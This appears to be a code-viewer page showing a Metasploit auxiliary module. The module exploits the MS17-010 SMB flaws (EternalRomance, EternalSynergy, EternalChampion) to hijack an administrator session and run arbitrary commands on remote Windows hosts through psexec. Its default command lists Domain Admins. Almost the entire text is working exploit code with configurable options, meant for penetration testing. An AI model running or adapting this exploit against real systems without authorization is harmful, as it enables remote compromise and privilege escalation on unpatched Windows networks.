Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
8
  include Msf::Exploit::Remote::SMB::Client::Psexec
9
  include Msf::Auxiliary::Report
10
  include Msf::Auxiliary::Scanner
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',
15
      'Description'    => %q{
16
          This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
17
          primitive. This will then be used to overwrite the connection session information with as an
18
           Administrator session. From there, the normal psexec command execution is done.
19

20
          Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
21
          Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
22
          exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
23
          named pipe.
24
      },
25

26
      'Author'         => [
27
        'sleepya',          # zzz_exploit idea and offsets
28
        'zerosum0x0',
29
        'Shadow Brokers',
30
        'Equation Group'
31
      ],
32

33
      'License'        => MSF_LICENSE,
34
      'References'     => [
35
        [ 'MSB', 'MS17-010' ],
36
        [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests
37
        [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests
38
        [ 'CVE', '2017-0147'], # for EternalRomance reference
39
        [ 'URL', 'https://github.com/worawit/MS17-010' ],
40
        [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
41
        [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],
42
      ],
43
      'DisclosureDate' => '2017-03-14',
44
      'Notes' =>
45
          {
46
              'AKA' => [
47
                  'ETERNALSYNERGY',
48
                  'ETERNALROMANCE',
49
                  'ETERNALCHAMPION',
50
                  'ETERNALBLUE'      # does not use any CVE from Blue, but Search should show this, it is preferred
51
              ]
52
          }
53
    ))
54

55
    register_options([
56
      OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
57
      OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group "Domain Admins" /domain']),
58
      OptPort.new('RPORT', [true, 'The Target port', 445]),
59
      OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),
60
    ])
61

62
    register_advanced_options([
63
      OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),
64
      OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),
65
      OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),
66
    ])
67

68
    deregister_options('SMB::ProtocolVersion')
69
  end
70

71
  def run_host(ip)
72
    begin
73
      if datastore['SMBUser'].present?
74
        print_status("Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...")
75
      end
76
      eternal_pwn(ip)         # exploit Admin session
77
      smb_pwn(ip)             # psexec
78

79
    rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e
80
      print_error("#{e.message}")
81
    rescue ::Errno::ECONNRESET,
82
           ::Rex::HostUnreachable,
83
           ::Rex::Proto::SMB::Exceptions::LoginError,
84
           ::Rex::ConnectionTimeout,
85
           ::Rex::ConnectionRefused  => e
86
      print_error("#{e.class}: #{e.message}")
87
    rescue => error
88
      print_error(error.class.to_s)
89
      print_error(error.message)
90
      print_error(error.backtrace.join("\n"))
91
    ensure
92
      eternal_cleanup()       # restore session
93
    end
94
  end
95

96
  def smb_pwn(ip)
97
    text = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt"
98
    bat  = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat"
99
    @smbshare = datastore['SMBSHARE']
100
    @ip = ip
101

102
    # Try and authenticate with given credentials
103
    output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, delay: datastore['DELAY'], retries: datastore['RETRY'])
104

105
    # Report output
106
    print_good("Command completed successfully!")
107
    print_status("Output for \"#{datastore['COMMAND']}\":\n")
108
    print_line("#{output}\n")
109
    report_note(
110
      :rhost => datastore['RHOSTS'],
111
      :rport => datastore['RPORT'],
112
      :type  => "psexec_command",
113
      :name => datastore['COMMAND'],
114
      :data => output
115
    )
116
  end
117
end
118

119